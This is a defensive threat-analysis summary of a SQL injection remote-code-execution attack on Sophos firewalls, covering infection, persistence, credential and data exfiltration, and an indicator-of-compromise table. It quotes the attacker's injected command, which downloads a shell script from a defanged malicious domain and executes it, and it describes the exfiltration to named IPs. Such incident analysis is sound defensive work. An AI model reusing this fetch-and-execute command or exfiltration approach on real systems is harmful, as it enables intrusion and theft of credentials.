- An SQL injection vulnerability, in some Sophos firewall products, that allowed remote code execution, was used to orchestrate a coordinated attack on Sophos and its customers.
- The attack, which used a chain of Linux shell scripts that downloaded ELF binary executable malware, was purportedly carried out to steal sensitive information from the firewall.
- The binary had the capabilities to steal:
- The firewall’s license and serial number
- Email addresses of user accounts that were stored on the device and the firewall admin’s primary email.
- Firewall users’ names, usernames, encrypted form of their passwords, and the salted SHA256 hash of the admin account’s password.
- User IDs permitted to use the firewall for SSL VPN and accounts that have permission to use a “clientless” VPN connection.
- After fixing the vulnerability, Sophos shared a detailed analysis of the attack and the malware.
Initial Infection
- An attacker discovered, and exploited, a zero-day SQL injection remote code execution vulnerability.
- This allowed the attacker to insert the following command into a database table: ||cd /tmp/ && wget hxxps://sophosfirewallupdate[.]com/sp/install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh||
- Once inserted, the command downloaded a shell script into the /tmp directory.
- And the script executed a series of SQL commands and dropped additional files into the virtual file system.
Execution and Defence Evasion
- The script initially ran Postgres SQL commands to modify or the values of certain tables in the database.
- However, it backfired, and the attacker’s SQL command line appeared on the firewall’s admin panel.
- The x.sh downloaded some other scripts to connect to sophosfirewallupdate c2c server.
- It downloaded and ran an ELF binary file. After which, it deleted itself from the device filesystem.
- In the process list, the program name is: cssconf.bin, which resembles the legitimate process: cscconf.bin.
- While the binary was in memory, it repeated a series of tasks every 3 to 6 hours.
- It first tried to make a connection to 43.229.55.44.
- If not, it resolved the IP for sophosproductupdate[.]com to download another ELF binary Sophos.dat.
- The other two shell scripts, retrieved by initial x.sh script, acts as a backup if the previous steps fail.
Persistence
- The script dropped at least two other shell scripts into the /tmp directory and modified at least one shell script that is part of the firewall’s OS to add a set of commands to the end of the script.
- This last script served as a roundabout persistence mechanism for the malware by modifying services to ensure it ran every time the firewall booted.
Exfiltration
- The ELF binary, Sophos.dat on the remote server, was saved to the filesystem as 2own.
- This binary ran operating system commands to steal data from database tables stored in the firewall.
- The malware concatenated the data to a file named Info.xg, stored temporarily on the firewall.
- The binary tries to retrieve the public IP of a firewall using ipconfig.me, if not, it queries checkip.dyndns.org.
- It then queried data storage areas on the firewall to acquire information about the firewall and its users. This included the IP address allocation permissions, the OS version, CPU type, amount of memory, etc.
- It then compressed the information stored in Info.xg and used OpenSSL to encrypt the archive file.
- The encrypted file was to be uploaded to a machine at the IP: 38.27.99.69.
- The malware finally cleaned up its tracks by deleting the files temporarily created to collect information.
Indicators of Compromise
File Indicators | |||
File name | SHA256 | File Type | Functionality |
Install.sh [/tmp/x.sh] | 736da16da96222d3dfbb864376cafd58239344b536c75841805c661f220072e5 | Bash | Main install script. Compromised firewall settings, dropped two files and modified a third. |
Shell script | |||
lc [/tmp/.n.sh] | a226c6a641291ef2916118b048d508554afe0966974c5ca241619e8a375b8c6b | Bash | Downloaded lp (ELF dropper) |
Shell script | |||
bk [/var/newdb/global/.post_MI] | 4de3258ebba1ef3638642a011020a004b4cd4dbe8cd42613e24edf37e6cf9d71 | ELF | Downloaded patch.sh |
X86 binary | |||
lp [/tmp/b] | 9650563aa660ccbfd91c0efc2318cf98bfe9092b4a2abcd98c7fc44aad265fda | ELF | Main dropper. Downloaded 2own (data exfiltration) module |
X86 binary | |||
in.s_h | 8e9965c2bb0964fde7c1aa0e8b5d74158e37443d857fc227c1883aa74858e985 | Bash | Slightly modified form of install.sh |
Shell script | |||
2own | 31e43ecd203860ba208c668a0e881a260ceb24cb1025262d42e03209aed77fe4 | ELF | Data theft module. Exfiltrates to 38.27.99.69 |
X86 script |
Network Indicators | |||
URLs | Domains | IPs | File System Pathways |
|
|
|
|